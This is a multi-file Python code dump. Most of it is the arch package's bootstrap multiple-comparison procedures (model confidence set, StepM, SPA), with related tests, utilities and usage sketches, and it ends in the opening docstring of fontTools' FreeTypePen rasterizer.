seed: Union[None, int, np.random.Generator, np.random.RandomState] = None,
) -> None:
super().__init__()
self.losses: Float64Array = ensure2d(losses, "losses")
self._losses_arr = np.asarray(self.losses)
if self._losses_arr.shape[1] < 2:
raise ValueError("losses must have at least two columns")
self.size: float = size
self.reps: int = reps
if block_size is None:
self.block_size = int(np.sqrt(losses.shape[0]))
else:
self.block_size = block_size
self.t: int = losses.shape[0]
self.k: int = losses.shape[1]
self.method: Literal["R", "max"] = method
# Bootstrap indices since the same bootstrap should be used in the
# repeated steps
indices = np.arange(self.t)
bootstrap_meth = bootstrap.lower().replace(" ", "_")
if bootstrap_meth in ("circular", "cbb"):
bootstrap_inst = CircularBlockBootstrap(self.block_size, indices, seed=seed)
elif bootstrap_meth in ("stationary", "sb"):
bootstrap_inst = StationaryBootstrap(self.block_size, indices, seed=seed)
elif bootstrap_meth in ("moving_block", "mbb"):
bootstrap_inst = MovingBlockBootstrap(self.block_size, indices, seed=seed)
else:
raise ValueError(f"Unknown bootstrap: {bootstrap_meth}")
self._seed = seed
self.bootstrap: CircularBlockBootstrap = bootstrap_inst
self._bootstrap_indices: List[IntArray] = [] # For testing
self._model = "MCS"
self._info = dict(
[
("size", "{0:0.2f}".format(self.size)),
("bootstrap", str(bootstrap_inst)),
("ID", hex(id(self))),
]
)
self._results_computed = False
def _has_been_computed(self) -> None:
if not self._results_computed:
raise RuntimeError("Must call compute before accessing results")
def _format_pvalues(self, eliminated: Sequence[Tuple[int, float]]) -> pd.DataFrame:
columns = ["Model index", "Pvalue"]
mcs = pd.DataFrame(eliminated, columns=columns)
max_pval = mcs.iloc[0, 1]
for i in range(1, mcs.shape[0]):
max_pval = np.max([max_pval, mcs.iloc[i, 1]])
mcs.iloc[i, 1] = max_pval
model_index = mcs.pop("Model index")
if isinstance(self.losses, pd.DataFrame):
# Workaround for old pandas/numpy combination
# Preferred expression :
# model_index = pd.Series(self.losses.columns[model_index])
model_index = self.losses.iloc[:, model_index.values].columns
model_index = pd.Series(model_index)
model_index.name = "Model name"
mcs.index = model_index
return mcs
def compute(self) -> None:
"""
Compute the set of models in the confidence set.
"""
if self.method.lower() == "r":
self._compute_r()
else:
self._compute_max()
self._results_computed = True
def _compute_r(self) -> None:
"""
Computes the model confidence set using the R method
"""
# R method
# 1. Compute pairwise difference (k,k)
losses = self._losses_arr
mean_losses = losses.mean(0)[:, None]
loss_diffs = mean_losses - mean_losses.T
# Compute pairwise variance using bootstrap (k,k)
# In each bootstrap, save the average difference of each pair (b,k,k)
bootstrapped_mean_losses = np.zeros((self.reps, self.k, self.k))
bs = self.bootstrap
for j, data in enumerate(bs.bootstrap(self.reps)):
bs_index = data[0][0] # Only element in pos data
self._bootstrap_indices.append(bs_index) # For testing
mean_losses_star = losses[bs_index].mean(0)[:, None]
bootstrapped_mean_losses[j] = mean_losses_star - mean_losses_star.T
# Recenter
bootstrapped_mean_losses -= loss_diffs
variances = (bootstrapped_mean_losses ** 2).mean(0)
variances += np.eye(self.k) # Prevent division by 0
self._variances = variances
# Standardize everything
std_loss_diffs = loss_diffs / np.sqrt(variances)
std_bs_mean_losses = bootstrapped_mean_losses / np.sqrt(variances)
# 3. Using the models still in the set, compute the max (b,1)
# Initialize the set
included = np.ones(self.k, dtype=np.bool_)
# Loop until there is only 1 model left
eliminated = []
while included.sum() > 1:
indices = np.argwhere(included)
included_loss_diffs = std_loss_diffs[indices, indices.T]
test_stat = np.max(included_loss_diffs)
included_bs_losses = std_bs_mean_losses[:, indices, indices.T]
simulated_test_stat = np.max(np.max(included_bs_losses, 2), 1)
pval = (test_stat < simulated_test_stat).mean()
loc = np.argwhere(included_loss_diffs == test_stat)
# loc holds indices (i, j) -- i is the model to eliminate.
# Diffs are L(i) - L(j), so a large value at [i, j] indicates
# that model i is worse than model j, hence i is eliminated.
i = loc.squeeze()[0]
eliminated.append((indices.flat[i], pval))
included[indices.flat[i]] = False
# Add pval of 1 for model remaining
indices = np.argwhere(included).flatten()
for ind in indices:
eliminated.append((ind, 1.0))
self._pvalues = self._format_pvalues(eliminated)
def _compute_max(self) -> None:
"""
Computes the model confidence set using the max method
"""
# max method
losses = self._losses_arr
# 1. compute loss "errors"
loss_errors = losses - losses.mean(0)
# Generate bootstrap samples
bs_avg_loss_errors = np.zeros((self.reps, self.k))
for i, data in enumerate(self.bootstrap.bootstrap(self.reps)):
bs_index = data[0][0]
self._bootstrap_indices.append(bs_index) # For testing
bs_errors = loss_errors[bs_index]
avg_bs_errors = bs_errors.mean(0)
avg_bs_errors -= avg_bs_errors.mean()
bs_avg_loss_errors[i] = avg_bs_errors
# Initialize the set
included = np.ones(self.k, dtype=np.bool_)
# Loop until there is only 1 model left
eliminated = []
while included.sum() > 1:
indices = np.argwhere(included)
incl_losses = losses[:, included]
incl_bs_avg_loss_err = bs_avg_loss_errors[:, included]
incl_bs_grand_loss = incl_bs_avg_loss_err.mean(1)
# Reshape for broadcast
incl_bs_avg_loss_err -= incl_bs_grand_loss[:, None]
std_devs = np.sqrt((incl_bs_avg_loss_err ** 2).mean(0))
simulated_test_stat = incl_bs_avg_loss_err / std_devs
simulated_test_stat = np.max(simulated_test_stat, 1)
loss_diffs = incl_losses.mean(0)
loss_diffs -= loss_diffs.mean()
std_loss_diffs = loss_diffs / std_devs
test_stat = np.max(std_loss_diffs)
pval = (test_stat < simulated_test_stat).mean()
locs = np.argwhere(std_loss_diffs == test_stat)
eliminated.append((int(indices.flat[locs.squeeze()]), pval))
included[indices.flat[locs]] = False
indices = np.argwhere(included).flatten()
for ind in indices:
eliminated.append((int(ind), 1.0))
self._pvalues = self._format_pvalues(eliminated)
@property
def included(self) -> List[Hashable]:
"""
List of model indices that are included in the MCS
Returns
-------
included : list
List of column indices or names of the included models
"""
self._has_been_computed()
included = self._pvalues.Pvalue > self.size
included = list(self._pvalues.index[included])
included.sort()
return included
@property
def excluded(self) -> List[Hashable]:
"""
List of model indices that are excluded from the MCS
Returns
-------
excluded : list
List of column indices or names of the excluded models
"""
self._has_been_computed()
excluded = self._pvalues.Pvalue <= self.size
excluded = list(self._pvalues.index[excluded])
excluded.sort()
return excluded
@property
def pvalues(self) -> pd.DataFrame:
"""
Model p-values for inclusion in the MCS
Returns
-------
pvalues : DataFrame
DataFrame where the index is the model index (column or name)
containing the smallest size where the model is in the MCS.
"""
self._has_been_computed()
return self._pvalues
class StepM(MultipleComparison):
"""
StepM multiple comparison procedure of Romano and Wolf.
Parameters
----------
benchmark : {ndarray, Series}
T element array of benchmark model *losses*
models : {ndarray, DataFrame}
T by k element array of alternative model *losses*
size : float, optional
Value in (0,1) to use as the test size when implementing the
comparison. Default value is 0.05.
block_size : int, optional
Length of window to use in the bootstrap. If not provided, sqrt(T)
is used. In general, this should be provided and chosen to be
appropriate for the data.
reps : int, optional
Number of bootstrap replications to use. Default is 1000.
bootstrap : str, optional
Bootstrap to use. Options are
'stationary' or 'sb': Stationary bootstrap (Default)
'circular' or 'cbb': Circular block bootstrap
'moving block' or 'mbb': Moving block bootstrap
studentize : bool, optional
Flag indicating to studentize loss differentials. Default is True
nested : bool, optional
Flag indicating to use a nested bootstrap to compute variances for
studentization. Default is False. Note that this can be slow since
the procedure requires k extra bootstraps.
seed : {int, Generator, RandomState}, optional
Seed value to use when creating the bootstrap used in the comparison.
If an integer or None, the NumPy default_rng is used with the seed
value. If a Generator or a RandomState, the argument is used.
Notes
-----
The size controls the Family Wise Error Rate (FWER) since this is a
multiple comparison procedure. Uses SPA and the consistent selection
procedure.
See [1]_ for details.
See Also
--------
SPA
References
----------
.. [1] Romano, J. P., & Wolf, M. (2005). Stepwise multiple testing as
formalized data snooping. Econometrica, 73(4), 1237-1282.
"""
def __init__(
self,
benchmark: ArrayLike,
models: ArrayLike,
size: float = 0.05,
block_size: Optional[int] = None,
reps: int = 1000,
bootstrap: Literal[
"stationary", "sb", "circular", "cbb", "moving block", "mbb"
] = "stationary",
studentize: bool = True,
nested: bool = False,
*,
seed: Union[None, int, np.random.Generator, np.random.RandomState] = None,
) -> None:
super(StepM, self).__init__()
self.benchmark: Float64Array = ensure2d(benchmark, "benchmark")
self.models: Float64Array = ensure2d(models, "models")
self.spa: SPA = SPA(
benchmark,
models,
block_size=block_size,
reps=reps,
bootstrap=bootstrap,
studentize=studentize,
nested=nested,
seed=seed,
)
self.block_size: int = self.spa.block_size
self.t: int = self.models.shape[0]
self.k: int = self.models.shape[1]
self.reps: int = reps
self.size: float = size
self._superior_models: Optional[List[Hashable]] = None
self.bootstrap: CircularBlockBootstrap = self.spa.bootstrap
self._model = "StepM"
if self.spa.studentize:
method = "bootstrap" if self.spa.nested else "asymptotic"
else:
method = "none"
self._info = dict(
[
("FWER (size)", "{:0.2f}".format(self.size)),
("studentization", method),
("bootstrap", str(self.spa.bootstrap)),
("ID", hex(id(self))),
]
)
def compute(self) -> None:
"""
Compute the set of superior models.
"""
# 1. Run SPA
self.spa.compute()
# 2. If any models superior, store indices, remove and re-run SPA
better_models = list(self.spa.better_models(self.size))
all_better_models = better_models[:]
# 3. Stop if nothing superior
while better_models and (len(better_models) < self.k):
# A. Use Selector to remove better models
selector = np.ones(self.k, dtype=np.bool_)
if isinstance(self.models, pd.DataFrame): # Columns
selector[self.models.columns.isin(all_better_models)] = False
else:
selector[np.array(all_better_models)] = False
self.spa.subset(selector)
# B. Rerun
self.spa.compute()
better_models = list(self.spa.better_models(self.size))
all_better_models.extend(better_models)
# Reset SPA
selector = np.ones(self.k, dtype=np.bool_)
self.spa.subset(selector)
all_better_models.sort()
self._superior_models = all_better_models
@property
def superior_models(self) -> List[Hashable]:
"""
List of the indices or column names of the superior models
Returns
-------
list
List of superior models. Contains column indices if models is an
array or contains column names if models is a DataFrame.
"""
if self._superior_models is None:
msg = "compute must be called before accessing superior_models"
raise RuntimeError(msg)
return self._superior_models
class SPA(MultipleComparison, metaclass=DocStringInheritor):
"""
Test of Superior Predictive Ability (SPA) of White and Hansen.
The SPA is also known as the Reality Check or Bootstrap Data Snooper.
Parameters
----------
benchmark : {ndarray, Series}
T element array of benchmark model *losses*
models : {ndarray, DataFrame}
T by k element array of alternative model *losses*
block_size : int, optional
Length of window to use in the bootstrap. If not provided, sqrt(T)
is used. In general, this should be provided and chosen to be
appropriate for the data.
reps : int, optional
Number of bootstrap replications to use. Default is 1000.
bootstrap : str, optional
Bootstrap to use. Options are
'stationary' or 'sb': Stationary bootstrap (Default)
'circular' or 'cbb': Circular block bootstrap
'moving block' or 'mbb': Moving block bootstrap
studentize : bool
Flag indicating to studentize loss differentials. Default is True
nested : bool, optional
Flag indicating to use a nested bootstrap to compute variances for
studentization. Default is False. Note that this can be slow since
the procedure requires k extra bootstraps.
seed : {int, Generator, RandomState}, optional
Seed value to use when creating the bootstrap used in the comparison.
If an integer or None, the NumPy default_rng is used with the seed
value. If a Generator or a RandomState, the argument is used.
Notes
-----
The three p-values correspond to different re-centering decisions.
- Upper : Never recenter, so all models are treated as relevant to the distribution
- Consistent : Only recenter if closer than a log(log(t)) bound
- Lower : Never recenter a model if worse than benchmark
See [1]_ and [2]_ for details.
See Also
--------
StepM
References
----------
.. [1] Hansen, P. R. (2005). A test for superior predictive ability.
Journal of Business & Economic Statistics, 23(4), 365-380.
.. [2] White, H. (2000). A reality check for data snooping. Econometrica,
68(5), 1097-1126.
"""
def __init__(
self,
benchmark: ArrayLike,
models: ArrayLike,
block_size: Optional[int] = None,
reps: int = 1000,
bootstrap: Literal[
"stationary", "sb", "circular", "cbb", "moving block", "mbb"
] = "stationary",
studentize: bool = True,
nested: bool = False,
*,
seed: Union[None, int, np.random.Generator, np.random.RandomState] = None,
) -> None:
super().__init__()
self.benchmark: Float64Array = ensure2d(benchmark, "benchmark")
self.models: Float64Array = ensure2d(models, "models")
self.reps: int = reps
if block_size is None:
self.block_size = int(np.sqrt(benchmark.shape[0]))
else:
self.block_size = block_size
self.studentize: bool = studentize
self.nested: bool = nested
self._loss_diff = np.asarray(self.benchmark) - np.asarray(self.models)
self._loss_diff_var = np.empty(0)
self.t: int = self._loss_diff.shape[0]
self.k: int = self._loss_diff.shape[1]
bootstrap_name = bootstrap.lower().replace(" ", "_")
if bootstrap_name in ("circular", "cbb"):
bootstrap_inst = CircularBlockBootstrap(
self.block_size, self._loss_diff, seed=seed
)
elif bootstrap_name in ("stationary", "sb"):
bootstrap_inst = StationaryBootstrap(
self.block_size, self._loss_diff, seed=seed
)
elif bootstrap_name in ("moving_block", "mbb"):
bootstrap_inst = MovingBlockBootstrap(
self.block_size, self._loss_diff, seed=seed
)
else:
raise ValueError(f"Unknown bootstrap: {bootstrap_name}")
self._seed = seed
self.bootstrap: CircularBlockBootstrap = bootstrap_inst
self._pvalues: Dict[str, float] = {}
self._simulated_vals: Optional[Float64Array] = None
self._selector = np.ones(self.k, dtype=np.bool_)
self._model = "SPA"
if self.studentize:
method = "bootstrap" if self.nested else "asymptotic"
else:
method = "none"
self._info = dict(
[
("studentization", method),
("bootstrap", str(self.bootstrap)),
("ID", hex(id(self))),
]
)
def reset(self) -> None:
"""
Reset the bootstrap to its initial state.
"""
super(SPA, self).reset()
self._pvalues = {}
def subset(self, selector: BoolArray) -> None:
"""
Sets a list of active models to run the SPA on. Primarily for
internal use.
Parameters
----------
selector : ndarray
Boolean array indicating which columns to use when computing the
p-values. This is primarily for use by StepM.
"""
self._selector = selector
def compute(self) -> None:
"""
Compute the bootstrap pvalue.
Notes
-----
Must be called before accessing the pvalue.
"""
# Plan
# 1. Compute variances
if self._simulated_vals is None:
self._simulate_values()
simulated_vals = self._simulated_vals
# Use subset if needed
assert simulated_vals is not None
simulated_vals = simulated_vals[self._selector, :, :]
max_simulated_vals = np.max(simulated_vals, 0)
loss_diff = self._loss_diff[:, self._selector]
max_loss_diff = np.max(loss_diff.mean(axis=0))
pvalues = (max_simulated_vals > max_loss_diff).mean(axis=0)
self._pvalues = dict(
[("lower", pvalues[0]), ("consistent", pvalues[1]), ("upper", pvalues[2])]
)
def _simulate_values(self) -> None:
self._compute_variance()
# 2. Compute invalid columns using criteria for consistent
self._valid_columns = self._check_column_validity()
# 3. Compute simulated values
# Upper always re-centers
upper_mean = self._loss_diff.mean(0)
consistent_mean = upper_mean.copy()
consistent_mean[np.logical_not(self._valid_columns)] = 0.0
lower_mean = upper_mean.copy()
# Lower does not re-center those that are worse
lower_mean[lower_mean < 0] = 0.0
means = [lower_mean, consistent_mean, upper_mean]
simulated_vals = np.zeros((self.k, self.reps, 3))
for i, bs_data in enumerate(self.bootstrap.bootstrap(self.reps)):
pos_arg, kw_arg = bs_data
loss_diff_star = pos_arg[0]
for j, mean in enumerate(means):
simulated_vals[:, i, j] = loss_diff_star.mean(0) - mean
self._simulated_vals = simulated_vals
def _compute_variance(self) -> None:
"""
Estimates the variance of the loss differentials
Returns
-------
var : ndarray
Array containing the variances of each loss differential
"""
ld = self._loss_diff
demeaned = ld - ld.mean(axis=0)
if self.nested:
# Use bootstrap to estimate variances
bs = self.bootstrap.clone(demeaned, seed=copy.deepcopy(self._seed))
means = bs.apply(lambda x: x.mean(0), reps=self.reps)
variances = self.t * means.var(axis=0)
else:
t = self.t
p = 1.0 / self.block_size
variances = np.sum(demeaned ** 2, 0) / t
for i in range(1, t):
kappa = ((1.0 - (i / t)) * ((1 - p) ** i)) + (
(i / t) * ((1 - p) ** (t - i))
)
variances += (
2 * kappa * np.sum(demeaned[: (t - i), :] * demeaned[i:, :], 0) / t
)
self._loss_diff_var = cast(np.ndarray, variances)
def _check_column_validity(self) -> BoolArray:
"""
Checks whether the loss from the model is too low relative to its mean
to be asymptotically relevant.
Returns
-------
valid : ndarray
Boolean array indicating columns relevant for consistent p-value
calculation
"""
t, variances = self.t, self._loss_diff_var
mean_loss_diff = self._loss_diff.mean(0)
threshold = -1.0 * np.sqrt((variances / t) * 2 * np.log(np.log(t)))
return mean_loss_diff >= threshold
@property
def pvalues(self) -> pd.Series:
"""
P-values corresponding to the lower, consistent and
upper p-values.
Returns
-------
pvals : Series
Three p-values corresponding to the lower bound, the consistent
estimator, and the upper bound.
"""
self._check_compute()
return pd.Series(list(self._pvalues.values()), index=list(self._pvalues.keys()))
def critical_values(self, pvalue: float = 0.05) -> pd.Series:
"""
Returns data-dependent critical values
Parameters
----------
pvalue : float, optional
P-value in (0,1) to use when computing the critical values.
Returns
-------
crit_vals : Series
Series containing critical values for the lower, consistent and
upper methodologies
"""
self._check_compute()
if not (0.0 < pvalue < 1.0):
raise ValueError("pvalue must be in (0,1)")
# Subset if needed
assert self._simulated_vals is not None
simulated_values = self._simulated_vals[self._selector, :, :]
max_simulated_values = np.max(simulated_values, axis=0)
crit_vals = np.percentile(max_simulated_values, 100.0 * (1 - pvalue), axis=0)
return pd.Series(crit_vals, index=list(self._pvalues.keys()))
def better_models(
self,
pvalue: float = 0.05,
pvalue_type: Literal["lower", "consistent", "upper"] = "consistent",
) -> Union[IntArray, List[Hashable]]:
"""
Returns set of models rejected as being equal-or-worse than the
benchmark
Parameters
----------
pvalue : float, optional
P-value in (0,1) to use when computing superior models
pvalue_type : str, optional
String in 'lower', 'consistent', or 'upper' indicating which
critical value to use.
Returns
-------
indices : list
List of column names or indices of the superior models. Column
names are returned if models is a DataFrame.
Notes
-----
List of superior models returned is always with respect to the initial
set of models, even when using subset().
"""
self._check_compute()
if pvalue_type not in self._pvalues:
raise ValueError("Unknown pvalue type")
crit_val = self.critical_values(pvalue=pvalue)[pvalue_type]
better_models = self._loss_diff.mean(0) > crit_val
better_models = np.logical_and(better_models, self._selector)
if isinstance(self.models, pd.DataFrame):
return list(self.models.columns[better_models])
else:
return np.argwhere(better_models).flatten()
def _check_compute(self) -> None:
if self._pvalues:
return
msg = "compute must be called before pvalues are available."
raise RuntimeError(msg)
class RealityCheck(SPA):
# Shallow clone of SPA
pass
```
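The comparison classes above are easiest to see end-to-end with synthetic loss series. The sketch below is illustrative only: it assumes `SPA`, `StepM`, and the model confidence set class (`MCS`) are exposed from `arch.bootstrap`, as in released versions of the arch package, and it uses random data in place of real forecast losses.
```python
# Illustrative sketch only; assumes SPA, StepM and MCS are importable from
# arch.bootstrap as in released arch versions, and uses synthetic losses.
import numpy as np
from arch.bootstrap import MCS, SPA, StepM

rng = np.random.default_rng(0)
t, k = 500, 5
benchmark = rng.standard_normal(t) ** 2            # benchmark model losses
models = rng.standard_normal((t, k)) ** 2 + 0.05   # alternatives, slightly worse

spa = SPA(benchmark, models, reps=500, seed=0)
spa.compute()
print(spa.pvalues)             # lower / consistent / upper p-values

stepm = StepM(benchmark, models, size=0.05, reps=500, seed=0)
stepm.compute()
print(stepm.superior_models)   # models found to beat the benchmark (likely empty here)

mcs = MCS(models, size=0.05, reps=500, seed=0)
mcs.compute()
print(mcs.included, mcs.excluded)
```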
#### File: arch/__future__/_utility.py
```python
import sys
from typing import Optional
import warnings
def check_reindex(reindex: Optional[bool]) -> bool:
default = False if "arch.__future__.reindexing" in sys.modules else True
if reindex is None:
if default:
warnings.warn(
"""
The default for reindex is True. After September 2021 this will change to
False. Set reindex to True or False to silence this message. Alternatively,
you can use the import statement
from arch.__future__ import reindexing
to globally set reindex to False and silence this warning.
""",
FutureWarning,
)
reindex = default
return reindex
```
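A small behavioural sketch of the helper above. It assumes the private module path shown in the file header and that `arch.__future__.reindexing` exists as the warning text suggests; both hold for the arch version this file comes from but are not a public API.
```python
# Illustrative only: exercises check_reindex directly through private paths.
import warnings
from arch.__future__._utility import check_reindex

with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    print(check_reindex(None))   # True (legacy default), FutureWarning emitted
    print(len(caught))           # 1

# Opting in to the future behaviour flips the default and silences the warning.
from arch.__future__ import reindexing  # noqa: F401  (import for side effect only)

print(check_reindex(None))       # False, no warning
print(check_reindex(True))       # explicit values pass through unchanged
```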
#### File: tests/bootstrap/test_block_length.py
```python
import numpy as np
from numpy.testing import assert_allclose
import pandas as pd
from arch.bootstrap.base import optimal_block_length
def test_block_length():
rs = np.random.RandomState(0)
e = rs.standard_normal(10000 + 100)
y = e
for i in range(1, len(e)):
y[i] = 0.3 * y[i - 1] + e[i]
s = pd.Series(y[100:], name="x")
bl = optimal_block_length(s)
sb, cb = bl.loc["x"]
assert_allclose(sb, 13.635665, rtol=1e-4)
assert_allclose(cb, 15.60894, rtol=1e-4)
df = pd.DataFrame([s, s]).T
df.columns = ["x", "y"]
bl = optimal_block_length(df)
for idx in ("x", "y"):
sb, cb = bl.loc[idx]
assert_allclose(sb, 13.635665, rtol=1e-4)
assert_allclose(cb, 15.60894, rtol=1e-4)
assert tuple(bl.columns) == ("stationary", "circular")
assert tuple(bl.index) == ("x", "y")
bl = optimal_block_length(np.asarray(df))
assert tuple(bl.index) == (0, 1)
```
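The estimated block lengths above are meant to seed a block bootstrap. A hedged sketch that reuses the AR(1) setup from the test and feeds the stationary estimate into `StationaryBootstrap`; the constructor and `apply` usage follow what is visible in the SPA code earlier in this document.
```python
# Sketch: estimate a block length, then bootstrap the sample mean with it.
import numpy as np
import pandas as pd
from arch.bootstrap import StationaryBootstrap
from arch.bootstrap.base import optimal_block_length

rng = np.random.RandomState(0)
e = rng.standard_normal(1100)
y = e.copy()
for i in range(1, len(y)):
    y[i] = 0.3 * y[i - 1] + e[i]
s = pd.Series(y[100:], name="x")

block = optimal_block_length(s).loc["x", "stationary"]   # mean block length estimate
bs = StationaryBootstrap(int(round(block)), s, seed=12345)
means = bs.apply(lambda a: a.mean(), reps=250)           # bootstrap distribution of the mean
print(block, means.std())
```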
#### File: tests/utility/test_cov.py
```python
from arch.compat.statsmodels import dataset_loader
from numpy import diff, log
from numpy.random import RandomState
from numpy.testing import assert_almost_equal
import pytest
from statsmodels.datasets import macrodata
from arch.utility import cov_nw
class TestVarNW(object):
@classmethod
def setup_class(cls):
cls.rng = RandomState(12345)
cls.cpi = log(dataset_loader(macrodata)["cpi"])
cls.inflation = diff(cls.cpi)
def test_cov_nw(self):
y = self.inflation
simple_cov = cov_nw(y, lags=0)
e = y - y.mean()
assert_almost_equal(e.dot(e) / e.shape[0], simple_cov)
def test_cov_nw_ddof(self):
y = self.inflation
simple_cov = cov_nw(y, lags=0, ddof=1)
e = y - y.mean()
n = e.shape[0]
assert_almost_equal(e.dot(e) / (n - 1), simple_cov)
def test_cov_nw_no_demean(self):
y = self.inflation
simple_cov = cov_nw(y, lags=0, demean=False)
assert_almost_equal(y.dot(y) / y.shape[0], simple_cov)
def test_cov_nw_2d(self):
y = self.rng.randn(100, 2)
simple_cov = cov_nw(y, lags=0)
e = y - y.mean(0)
assert_almost_equal(e.T.dot(e) / e.shape[0], simple_cov)
def test_cov_nw_2d_2lags(self):
y = self.rng.randn(100, 2)
e = y - y.mean(0)
gamma_0 = e.T.dot(e)
gamma_1 = e[1:].T.dot(e[:-1])
gamma_2 = e[2:].T.dot(e[:-2])
w1, w2 = 1.0 - (1.0 / 3.0), 1.0 - (2.0 / 3.0)
expected = (
gamma_0 + w1 * (gamma_1 + gamma_1.T) + w2 * (gamma_2 + gamma_2.T)
) / 100.0
assert_almost_equal(cov_nw(y, lags=2), expected)
def test_cov_nw_axis(self):
y = self.rng.randn(100, 2)
e = y - y.mean(0)
gamma_0 = e.T.dot(e)
gamma_1 = e[1:].T.dot(e[:-1])
gamma_2 = e[2:].T.dot(e[:-2])
w1, w2 = 1.0 - (1.0 / 3.0), 1.0 - (2.0 / 3.0)
expected = (
gamma_0 + w1 * (gamma_1 + gamma_1.T) + w2 * (gamma_2 + gamma_2.T)
) / 100.0
assert_almost_equal(cov_nw(y.T, lags=2, axis=1), expected)
def test_errors(self):
y = self.rng.randn(100, 2)
with pytest.raises(ValueError):
cov_nw(y, 200)
with pytest.raises(ValueError):
cov_nw(y, axis=3)
with pytest.raises(ValueError):
cov_nw(y, ddof=200)
```
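Beyond matching hand-computed kernels, the long-run variance from `cov_nw` is what one would plug into a HAC standard error. A small sketch using the same import as the tests above:
```python
# Sketch: Newey-West (HAC) standard error for the mean of an autocorrelated series.
import numpy as np
from arch.utility import cov_nw

rng = np.random.RandomState(0)
e = rng.standard_normal(1000)
y = e.copy()
for i in range(1, len(y)):
    y[i] = 0.5 * y[i - 1] + e[i]

lrv = cov_nw(y, lags=10)                  # long-run variance with Bartlett weights
hac_se = np.sqrt(lrv / y.shape[0])        # HAC standard error of the sample mean
naive_se = y.std() / np.sqrt(y.shape[0])  # ignores autocorrelation
print(hac_se, naive_se)                   # HAC SE is noticeably larger here
```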
#### File: tests/utility/test_utility.py
```python
import pytest
from arch import utility
@pytest.mark.slow
@pytest.mark.parametrize("arg", [["--collect-only"], "--collect-only"])
def test_runner(arg):
utility.test(arg, exit=False)
```
#### File: arch/utility/testing.py
```python
from __future__ import annotations
from typing import Dict
from scipy.stats import chi2
from arch.vendor import cached_property
__all__ = ["WaldTestStatistic"]
class WaldTestStatistic(object):
"""
Test statistic holder for Wald-type tests
Parameters
----------
stat : float
The test statistic
df : int
Degree of freedom.
null : str
A statement of the test's null hypothesis
alternative : str
A statement of the test's alternative hypothesis
name : str, default "" (empty)
Name of test
"""
def __init__(
self,
stat: float,
df: int,
null: str,
alternative: str,
name: str = "",
) -> None:
self._stat = stat
self._null = null
self._alternative = alternative
self.df: int = df
self._name = name
self.dist = chi2(df)
self.dist_name: str = "chi2({0})".format(df)
@property
def stat(self) -> float:
"""Test statistic"""
return self._stat
@cached_property
def pval(self) -> float:
"""P-value of test statistic"""
return 1 - self.dist.cdf(self.stat)
@cached_property
def critical_values(self) -> Dict[str, float]:
"""Critical values test for common test sizes"""
return dict(zip(["10%", "5%", "1%"], self.dist.ppf([0.9, 0.95, 0.99])))
@property
def null(self) -> str:
"""Null hypothesis"""
return self._null
@property
def alternative(self) -> str:
return self._alternative
def __str__(self) -> str:
name = "" if not self._name else self._name + "\n"
msg = (
"{name}H0: {null}\n{name}H1: {alternative}\nStatistic: {stat:0.4f}\n"
"P-value: {pval:0.4f}\nDistributed: {dist}"
)
return msg.format(
name=name,
null=self.null,
alternative=self.alternative,
stat=self.stat,
pval=self.pval,
dist=self.dist_name,
)
def __repr__(self) -> str:
return (
self.__str__()
+ "\n"
+ self.__class__.__name__
+ ", id: {0}".format(hex(id(self)))
)
```
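A minimal usage sketch of the holder above; the statistic and hypotheses are made up for illustration:
```python
# Sketch: wrap an (illustrative) chi-square distributed statistic.
from arch.utility.testing import WaldTestStatistic

ts = WaldTestStatistic(
    stat=7.3,
    df=2,
    null="Coefficients on lags 1 and 2 are zero",
    alternative="At least one lag coefficient is non-zero",
    name="Illustrative Wald test",
)
print(ts.stat, ts.df)         # 7.3 2
print(round(ts.pval, 4))      # 1 - chi2(2).cdf(7.3)
print(ts.critical_values)     # {'10%': ..., '5%': ..., '1%': ...}
print(ts)                     # formatted summary from __str__
```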
#### File: fontTools/pens/freetypePen.py
```python
__all__ = ['FreeTypePen']
import os
import ctypes
import platform
import subprocess
import collections
import math
import freetype
from freetype.raw import FT_Outline_Get_Bitmap, FT_Outline_Get_BBox, FT_Outline_Get_CBox
from freetype.ft_types import FT_Pos
from freetype.ft_structs import FT_Vector, FT_BBox, FT_Bitmap, FT_Outline
from freetype.ft_enums import FT_OUTLINE_NONE, FT_OUTLINE_EVEN_ODD_FILL, FT_PIXEL_MODE_GRAY
from freetype.ft_errors import FT_Exception
from fontTools.pens.basePen import BasePen
from fontTools.misc.roundTools import otRound
from fontTools.misc.transform import Transform
Contour = collections.namedtuple('Contour', ('points', 'tags'))
LINE = 0b00000001
CURVE = 0b00000011
OFFCURVE = 0b00000010
QCURVE = 0b00000001
QOFFCURVE = 0b00000000
class FreeTypePen(BasePen):
"""Pen to rasterize paths with FreeType. Requires `freetype-py` module.
Constructs ``FT_Outline`` from the paths, and renders it within a bitmap
buffer.
For ``array()`` and ``show()``, `numpy` and `matplotlib` must be installed.
For ``image()``, `Pillow` is required. Each module is lazily loaded when the
corresponding method is called.
Args:
glyphSet: a dictionary of drawable glyph objects keyed by name
used to resolve component references in composite glyphs.
:Examples:
If `numpy` and `matplotlib` are available, the following code will
show the glyph image of `fi` in a new window::
from fontTools.ttLib import TTFont
from fontTools.pens.freetypePen import FreeTypePen
from fontTools.misc.transform import Offset
pen = FreeTypePen(None)
font = TTFont('SourceSansPro-Regular.otf')
glyph = font.getGlyphSet()['fi']
glyph.draw(pen)
width, ascender, descender = glyph.width, font['OS/2'].usWinAscent, -font['OS/2'].usWinDescent
height = ascender - descender
pen.show(width=width, height=height, transform=Offset(0, -descender))
Combining with `uharfbuzz`, you can typeset a chunk of glyphs in a pen::
import uharfbuzz as hb
from fontTools.pens.freetypePen import FreeTypePen
from fontTools.pens.transformPen import TransformPen
from fontTools.misc.transform import Offset
en1, en2, ar, ja = 'Typesetting', 'Jeff', 'صف الحروف', 'たいぷせっと'
for text, font_path, direction, typo_ascender, typo_descender, vhea_ascender, vhea_descender, contain, features in (
(en1, 'NotoSans-Regular.ttf', 'ltr', 2189, -600, None, None, False, {"kern": True, "liga": True}),
(en2, 'NotoSans-Regular.ttf', 'ltr', 2189, -600, None, None, True, {"kern": True, "liga": True}),
(ar, 'NotoSansArabic-Regular.ttf', 'rtl', 1374, -738, None, None, False, {"kern": True, "liga": True}),
(ja, 'NotoSansJP-Regular.otf', 'ltr', 880, -120, 500, -500, False, {"palt": True, "kern": True}),
(ja, 'NotoSansJP-Regular.otf', 'ttb', 880, -120, 500, -500, False, {"vert": True, "vpal": True, "vkrn": True})
):
blob = hb.Blob.from_file_path(font_path)
face = hb.Face(blob)
font = hb.Font(face)
buf = hb.Buffer()
buf.direction = direction
buf.add_str(text)
buf.guess_segment_properties()
hb.shape(font, buf, features)
x, y = 0, 0
pen = FreeTypePen(None)
